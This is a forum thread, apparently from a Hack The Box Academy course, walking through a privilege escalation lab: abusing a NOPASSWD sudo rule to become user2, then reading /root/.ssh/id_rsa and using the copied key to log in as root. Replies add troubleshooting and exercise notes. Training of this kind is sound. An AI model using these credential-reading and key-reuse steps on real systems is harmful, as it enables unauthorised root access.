Getting started | privilege escalation | quick solve

HTB Content Academy
, ,
1

Hello, its x69h4ck3r here again.

I am gonna make this quick.

in other to solve this module, we need to gain access into the

target machine via ssh.

after that, we gain super user rights on the user2 user

then escalate our privilege to root user.

please follow my steps, will try to make this as easy as possible.

Step 1: connect to target machine via ssh with the credential provided;
example; ssh -l user1 <target_ip> -p

Step 2: input the given password in the password field.

NB: password text do not show on unix systems.

Step 3: Once connected, verify the directory you are in.
example; whoami

Step 4: Once sure you are in user1, change directory to user2.
example; cd … && cd user2 # this command will put you in user2 directory

Step 5: use the comman below to check if the /bin/bash file is readable
without password.
example; sudo -l
output; env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User user1 may run the following commands on gettingstartedprivesc-385616-5779f4664c-847tn:
(user2 : user2) NOPASSWD: /bin/bash

from the output we see that, we can run the user2 without password,

so we try it on /bin/bash , if no error is gotten, we then procced

to getting our first flag.

Step 6: use this command to view the /flag.txt file
example; cat flag.txt

GAINGING SUPER USER PRIVILEGE

in the /root/.ssh/id_rsa file hold the ssh key, if we can read that,

then we can use it to our advantage in connecting to the ssh

using the root user.

we first have to copy the ssh key, create a new file on our host

machine with the name “id_rsa” and paste the key in there, we will

using this file to connect to the target machine via ssh using the root

user.

Step 1: Read the /root/.ssh/id_rsa file and copy the contents.
example; cat /root/.ssh/id_rsa # copy the contents (ssh key)

Step 2: on your target machine create a new file “id_rsa” and paste the
copied contents in it.
example; nano id_rsa # once open, paste the copied contents (ssh key) and
# save.

Step 3: Cross-check you have done a good job by viewing the newly created
file.
example; cat id_rsa

Step 4: change the permissions on the newly created file to be more restrictive.
example; chmod 600 id_rsa

Step 5: Connect to the target server via ssh using the root as user and
the /id_rsa file for authentication, this way we can gain root access.
example; ssh root@<target_ip> -p -i id_rsa

Once connected, you will be in the root folder.

view the contents of the folder with the “ls” command

Step 6: Use the cat command to view the flag in the /flag.txt file
example; cat flag.txt

i hope it helps… Good luck. :slightly_smiling_face:

3

hello, when I log in I get this result, I followed everything the letter I do not understand can you help me pls " user2@gettingstartedprivesc-699870-6f6bc7fb57-nmgvg:~$ ssh -i /home/user2/id_rsa root@139.59.184.45 -p30647
ssh: connect to host 139.59.184.45 port 30647: Connection timed out
"

4

Having issues with this module. For some reason whenever I get to the vim step it won’t let me save the ssh key (E212 error) I’ve tried everything else everyone has recommended and looked up as many videos as I can and none of it has worked so far. Any help would be greatly appreciated.

5

EXERCISE NOTES:
Prompt 1: SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.

  • ssh [given user]@[given ip] -p [given port number of target IP]
  • sudo -l
  • sudo -su user2
  • cd ~
  • ls
  • cat flag.txt

Prompt 2: Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’.

  • whoami
  • cat /root/.ssh/id_rsa
  • copy results
  • cd ~

On a new cmd console (not within user2 of target ip but a cmd on the hackthebox user home) :

  • vim id_rsa
  • paste contents into id_rsa

Note: You can delete lines with the shift + v for visual mode (should not need to complete exercise). Source: [How can I delete multiple lines in vi? - Stack Overflow]
(How can I delete multiple lines in vi? - Stack Overflow)

Note: You can also edit individual characters within the vim by pressing ‘i’ (should not need to complete exercise). Press esc to exit INSERT mode. Source: How To Edit A File Using Vim On A Linux System – Systran Box

Commands:

  • Compare cat of id_rsa to cat /root/.ssh/id_rsa

Note: You can also check the word-counts of both files with: wc /home/user2/id_rsa
Source: https://linuxize.com/post/linux-wc-command/

Commands:

  • chmod 600 id_rsa
  • ssh root@ -p -i id_rsa

Note: You do not need to provide a path to the file; this is most likely due to the fact the hackthebox homd cmd console not having a id_rsa file

Commands:

  • ls
  • cat flag.txt

Notable commands attempted during exercise (should not need to complete the exercise):
1). You can check your current directory in linux with: pwd

2). You can also cancel a bad command with: shift + z

1 Like